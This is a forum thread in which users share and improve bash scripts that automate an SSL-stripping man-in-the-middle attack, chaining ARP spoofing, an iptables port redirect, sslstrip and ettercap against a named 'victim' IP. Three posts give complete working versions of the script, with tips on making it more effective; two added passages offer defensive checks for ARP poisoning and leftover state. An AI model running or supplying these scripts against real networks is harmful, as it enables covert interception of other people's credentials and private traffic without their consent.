
Thread: SSL sniffing script

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    1

    SSL sniffing script

    I made a script for SSL sniffing as per g0tmilk's howto here: forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html#post141532 .

    I'm not new to linux, but new to BackTrack. This is the first shell script that I ever made. Feedback would be GREATLY appreciated.

    Note: To use properly, you first have to uncomment 2 lines in /etc/etter.conf (the redir_command_on and redir_command_off lines for iptables).

    Code:
    #!/bin/bash
    clear
    echo "Hello $USER!"
    echo "Welcome to the SSL sniffing script"
    clear
    echo "What's the interface you'll be using? [eth0]"
    read iface
    if [ "$iface" = "" ]
    then
    iface="eth0"
    fi
    clear
    echo "What's the target's IP?"
    read tip
    clear
    echo "What's the target's gateway? [192.168.1.1]"
    read tdg
    if [ "$tdg" = "" ]
    then
    tdg="192.168.1.1"
    fi
    clear
    echo "The selected interface is $iface"
    echo "The target IP is $tip"
    echo "The target gateway is $tdg"
    echo "I'm ready to run the script."
    echo "Are you sure you want to run it [y/n]?"
    read yn
    if [ "$yn" != "y" ]
    then
    echo "Exiting..."
    echo "Have a nice day :)"
    exit 0
    fi
    clear
    echo "Running..."
    echo 1 > /proc/sys/net/ipv4/ip_forward
    konsole -e arpspoof -i $iface -t $tip $tdg &
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    konsole -e  sslstrip -a -k -f &
    clear
    echo "Running ettercap"
    ettercap -T -q -i $iface
    clear
    echo "All cleaned up."
    echo "Have a nice day :)"
    Hope this helps!
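
A defender's view of the ARP poisoning step in the script above, as an added example that is not part of the original post: it reads neighbour-table text in `ip neigh show` format and reports any MAC address bound to more than one IP. The sample table and its addresses are constructed, and `duplicate_macs` and `gateway_suspect` are names chosen here.

```shell
#!/bin/sh
# Added example, not from the thread: flag neighbour-table entries where one
# MAC answers for several IPs, the cache state that ARP poisoning leaves behind.

# Constructed sample in `ip neigh show` format; all addresses are made up.
SAMPLE_NEIGH='192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev eth0 lladdr 00:11:22:33:44:55 STALE
192.168.1.40 dev eth0 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.1.77 dev eth0  FAILED'

# duplicate_macs: read neighbour-table text on stdin and print one line per MAC
# bound to two or more IPs, in the form "<mac> <ip1>,<ip2>,...".
duplicate_macs() {
  awk '
    {
      mac = ""
      for (i = 1; i < NF; i++) if ($i == "lladdr") mac = tolower($(i + 1))
      if (mac == "") next            # FAILED/INCOMPLETE entries carry no MAC
      if (count[mac]++) ips[mac] = ips[mac] "," $1
      else ips[mac] = $1
    }
    END { for (m in count) if (count[m] > 1) print m, ips[m] }
  ' | sort
}

# gateway_suspect <gateway-ip>: exit 0 if, in the table on stdin, the gateway
# shares its MAC with another host; exit 1 otherwise.
gateway_suspect() {
  duplicate_macs | awk -v gw="$1" '
    { n = split($2, a, ","); for (i = 1; i <= n; i++) if (a[i] == gw) found = 1 }
    END { exit found ? 0 : 1 }'
}

printf '%s\n' "$SAMPLE_NEIGH" | duplicate_macs
if printf '%s\n' "$SAMPLE_NEIGH" | gateway_suspect 192.168.1.1; then
  echo "gateway 192.168.1.1 shares a MAC with another host"
fi
```

A shared MAC is not proof on its own, since proxy ARP and hosts with several addresses produce the same pattern; a hit on the gateway's address is the case worth following up.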

  2. #2
    Junior Member Deadboy's Avatar
    Join Date
    May 2009
    Location
    Louisiana
    Posts
    39


    nicely done. thanks!
    "Why is it drug addicts and computer afficionados are both called users? "

  3. #3
    Member floyd's Avatar
    Join Date
    Mar 2009
    Posts
    231


    remove at least the
    Code:
    echo "All cleaned up."
    because the system isn't cleaned up, you still have ip_forwarding enabled

    haven't tried the script
    Auswaertsspiel
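
The leftover state floyd describes can be checked rather than assumed. The added example below (not code from the thread) compares the forwarding flag with its value before the run and lists NAT redirect rules that are still present, printing the delete command for each; the sample rule text is constructed and `leftover_state` is a name chosen here.

```shell
#!/bin/sh
# Added example, not from the thread: report state a run leaves on the tester's host.

# Constructed sample of `iptables -t nat -S PREROUTING` output after a run.
SAMPLE_RULES='-P PREROUTING ACCEPT
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000'

# leftover_state <ip_forward before> <ip_forward now> <nat PREROUTING rules>
# Prints one finding per line and nothing at all when the host is clean.
leftover_state() {
  if [ "$1" != "$2" ]; then
    echo "ip_forward=$2, was $1 before the run"
  fi
  printf '%s\n' "$3" | awk '
    /^-A PREROUTING/ && /-j REDIRECT/ {
      sub(/^-A /, "-D ")             # append form -> matching delete form
      print "stale rule, remove with: iptables -t nat " $0
    }'
}

# On a live host (as root) the inputs would come from:
#   cat /proc/sys/net/ipv4/ip_forward     (once before the run, once after)
#   iptables -t nat -S PREROUTING
leftover_state 0 1 "$SAMPLE_RULES"
```

Comparing against the saved value rather than a fixed 0 matters on a machine that already forwards packets, where writing 0 on exit would itself be an unwanted change.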

  4. #4
    Just burned his ISO
    Join Date
    May 2009
    Posts
    11

    nice script

    But you don't have to uncomment the 2 lines!!!!
    then you would have ettercap forwarding the packets!!!
    When you uncomment the forwarding of ettercap then ettercap disables the ip forwarding of the kernel (it is in the manual) ...
    Ok? and don't forget to run ettercap in unoffensive mode ( -u arg)....

    Very good script by the way!!!

  5. #5
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181


    Well done Jimmy Kane

    Keep scripting and sharing

    BTW Welcome to the forums

    Nick

  6. #6
    Just burned his ISO thims's Avatar
    Join Date
    Nov 2009
    Posts
    5


    @davos1: Very nice script man, keep up the good work, and contributing.
    You most likely chose "konsole" so it launches those in their own terminals so you can view output, but just as a note (you might already know about it), the nohup command could be used in place of konsole if you were not running a graphical environment.

    I would like to contribute the script I use for SSL sniffing. With contributing this I am not trying to start a "competition" or anything, simply sharing open source code, in the mentality of open source (let's all share and improve each other's code). There are some issues I plan to address with this script, and many improvements I want to address. In the current state it executes correctly and is capable of grabbing the appropriate data. Please let me know of *any* issues you have with it, ideas, improvements, etc. All feedback is constructive feedback.

    General usage: sslsniff.sh -v <ip of target> -g <network gateway>
    -v and -g are required; -s is optional, and if excluded sslsniff defaults to port 10000.
    Also note: it is still required to edit etter.conf manually (plan to change that in the future)
    Code:
    #!/bin/bash
    #
    # Synopsis: A program to sniff traffic in an SSL connection
    # Author:   thims (thims DOT local AT gmail DOT com)
    # Version:  0.2
    # Date:     20091107
    # Comments: 
    #   ToDO:
    #         - Create section that edits iptables rules in /etc/etter.conf   
    
    
    # leave blank simply here for coding style
    victim=
    gateway=
    sslPort=10000
    
    # print help
    function help() {
    cat << EOF
    Usage: $0 [args] host
        -h, --help     -  Print this help and exit
        -v, --victim   -  IP address of desired host
        -g, --gateway  -  IP address of network gateway
        -s, --sslport  -  Desired port for sslstrip
    EOF
    }
    
    # echo supplied argument and die
    function die() {
      if [ -n "$1" ] ;then
        echo "$1"
      fi  
      exit 1
    }
    
    # nohup wrapper to check if specified program will execute correctly
    function noHup() {
      cmd="$1"
      nohup $cmd > /dev/null &> /dev/null &
      sleep 5
      # here simply to handle sslstrip because it is ran by python it throws off pidof
      if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
        pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
      else
        pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
      fi  
    
      if [ -z "$pid" ] ;then
        return 1
      else
        return 0
      fi  
    }
    
    # poison the arp
    function spoofMac() {
      echo -n "Poisoning the victim...."
      noHup "arpspoof -t "$victim" "$gateway""
      if [ $? -gt 0 ] ;then
        die "Error: could not initiate arpspoof. Dieing..."
      fi  
      echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
      echo "Ok"
    }
    
    # intercept the SSL cert
    function sslInit() {
      echo -n "Setting up SSL intercept...."
      echo 1 > /proc/sys/net/ipv4/ip_forward
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
      noHup "sslstrip -a -f -k -l "$sslPort""
      if [ $? -gt 0 ] ;then
        die "Error: could not initiate sslstrip. Dieing..."
      fi  
      echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
      echo "Ok"
    }
    
    # capture the responses
    function capture() {
      echo -n "Starting to sniff...."
      ettercap -T -q
    }
    
    # clean up enviroment
    function cleanUp() {
      echo "Cleaning up...."
      echo -n "Closing SSL proxy...."
      kill $(cat /var/run/sslsniff.sslstrip.run)
      rm /var/run/sslsniff.sslstrip.run
      echo "Ok"
      echo -n "Unpoisoning the victim...."
      kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
      rm /var/run/sslsniff.arpspoof.run
      echo "Ok"
      echo -n "Removing iptables rule and ip_forwarding...."
      iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
      echo 0 > /proc/sys/net/ipv4/ip_forward
      echo "Ok"
      echo "Have a nice day!"
    }
    
    # initialize the whole shebang
    function initialize() {
      if [ -z "$victim" ] || [ -z "$gateway" ] ;then
        help
        echo
        die "Error: a syntactical one"
      else
        spoofMac
        sslInit
        capture
        cleanUp
      fi
    }
    
    
    # some CLI ARGS?
    # each option reads the value that follows it; the value itself matches
    # no pattern below and is dropped by the next shift
    while [ $# -gt 0 ]
    do
      case "$1" in
        "-h"|"--help")
          help
          die
        ;;
        "-v"|"--victim")
          victim="$2"
        ;;
        "-g"|"--gateway"|"--gw")
          gateway="$2"
        ;;
        "-s"|"--sslport")
          sslPort="$2"
        ;;
        '')
          help
          echo
          die "Error: a syntactical one"
        ;;
        -*)
          help
          echo
          die "Error: a syntactical one"
        ;;
      esac
      shift
    done
    
    
    # main loop
    initialize

  7. #7
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181


    thims,

    Very nice script.

    I already got some ideas from it. I love this one:
    pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
    ...let's all share and improve each other's code....
    100% agree. After all linux is sharing.

    with contributing this I am not trying to start a "competition" or anything
    Why don't you start a new post? This may be considered a hijacking (?). Don't know.

    One idea from me is to upload it to mediafire or whatever so we don't have to come here every time and copy-paste etc.

    Keep scripting and sharing.

    (Please don't get bored soon. I personally keep my eyes on your scripts.)

    Nick

  8. #8
    Just burned his ISO
    Join Date
    May 2009
    Posts
    11

    A little more improvement!!!

    A little more improvement
    - taking the -i or --iface argument for choosing the interface, because arpspoof won't work if you don't run it with the -i arg ....
    - Printing the details of your configuration, and I have put a small cat /proc/sys/net/ipv4/ip_forward because sometimes echo 1 > /proc/sys/net/ipv4/ip_forward won't work (I don't know why)

    Code:
    #!/bin/bash
    #
    # Synopsis: A program to sniff traffic in an SSL connection
    # Author:   thims (thims DOT local AT gmail DOT com)
    # Version:  0.2
    # Date:     20091107
    # Comments: 
    #   ToDO:
    #         - Create section that edits iptables rules in /etc/etter.conf   
    
    
    # leave blank simply here for coding style
    victim=
    gateway=
    sslPort=10000
    
    # print help
    function help() {
    cat << EOF
    Usage: $0 [args] host
        -h, --help     -  Print this help and exit
        -i, --iface    -  Select the interface
        -v, --victim   -  IP address of desired host
        -g, --gateway  -  IP address of network gateway
        -s, --sslport  -  Desired port for sslstrip
    EOF
    }
    
    # echo supplied argument and die
    function die() {
      if [ -n "$1" ] ;then
        echo "$1"
      fi  
      exit 1
    }
    
    # nohup wrapper to check if specified program will execute correctly
    function noHup() {
      cmd="$1"
      nohup $cmd > /dev/null &> /dev/null &
      sleep 5
      # here simply to handle sslstrip because it is ran by python it throws off pidof
      if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
        pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
      else
        pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
      fi  
    
      if [ -z "$pid" ] ;then
        return 1
      else
        return 0
      fi  
    }
    
    # poison the arp
    function spoofMac() {
      echo -n "Poisoning the victim...."
      noHup "arpspoof -i "$iface" -t "$victim" "$gateway""
      if [ $? -gt 0 ] ;then
        die "Error: could not initiate arpspoof. Dieing..."
      fi  
      echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
      echo  "Ok"
    }
    
    # intercept the SSL cert
    function sslInit() {
      echo -n "Setting up SSL intercept...."
      echo "1" > /proc/sys/net/ipv4/ip_forward
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
      noHup "sslstrip -a -f -k -l "$sslPort""
      if [ $? -gt 0 ] ;then
        die "Error: could not initiate sslstrip. Dieing..."
      fi  
      echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
      # show the value the kernel actually holds after the write above
      echo "Forwarding: $(cat /proc/sys/net/ipv4/ip_forward)"
      echo "Ok"
    }
    
    # capture the responses
    function capture() {
      echo -n "Starting to sniff...."
      ettercap -T -q -i "$iface"
    }
    
    # clean up enviroment
    function cleanUp() {
      echo "Cleaning up...."
      echo -n "Closing SSL proxy...."
      kill $(cat /var/run/sslsniff.sslstrip.run)
      rm /var/run/sslsniff.sslstrip.run
      echo "Ok"
      echo -n "Unpoisoning the victim...."
      kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
      rm /var/run/sslsniff.arpspoof.run
      echo "Ok"
      echo -n "Removing iptables rule and ip_forwarding...."
      iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
      echo 0 > /proc/sys/net/ipv4/ip_forward
      echo "Ok"
      echo "Have a nice day!"
    }
    
    # initialize the whole shebang
    function initialize() {
      if [ -z "$victim" ] || [ -z "$gateway" ] || [ -z "$iface" ];then
        help
        echo
        die "Error: a syntactical one1"
      else
        echo "Victim:         " "$victim" "  Ok!"
        echo "Gateway/Router: " "$gateway" "  OK!"
        echo "Interface:          " "$iface" "    OK!"
        echo "SSLStrip on:       "	"$sslPort" "     OK!"
        spoofMac
        sslInit
        capture
        cleanUp
      fi
    }
    
    
    # some CLI ARGS?
    while [ $# -gt 0 ]
    do
      case "$1" in
        "-h"|"--help")
          help
          die
        ;;
        "-v"|"--victim")
          victim="$2"
        ;;
        "-g"|"--gateway"|"--gw")
          gateway="$2"
        ;;
        "-s"|"--sslport")
          sslPort="$2"
        ;;
        "-i"|"--iface")
          iface="$2"
        ;;
        '')
          help
          echo
          die "Error: a syntactical one"
        ;;
        -*)
          help
          echo
          die "Error: a syntactical one"
        ;;
      esac
      shift
    done
    
    
    # main loop
    initialize
    Greetings
    "Everything that is communication comes from ... quartz crystals..."

  9. #9
    Just burned his ISO thims's Avatar
    Join Date
    Nov 2009
    Posts
    5


    @nick_the_greek: thank you, I would like to think bash one-liners are my specialty (maybe just my interest, /me shrugs). Yeah, I thought about posting a new thread, but at the time I couldn't, being a new account, and I debated whether it would be a duplicate thread or a hijacking. I will probably create a new thread because I have made some changes already and incorporated a few new nice features. Also I just created a mediafire account, good call. I will keep sharing, have any suggestions? All suggestions are def. welcome.

    @jimmy Kane: Thank you, nice suggestions btw. I saw your email, was just procrastinating a bit. I added the iface option and am looking into the ip_forward issue. I haven't quite got a replica of the issue yet, care to provide more details on it? I might just end up adding some error correction for when it sets up the ip_forward.

    Note: when I create the new thread I will link to it from this post.
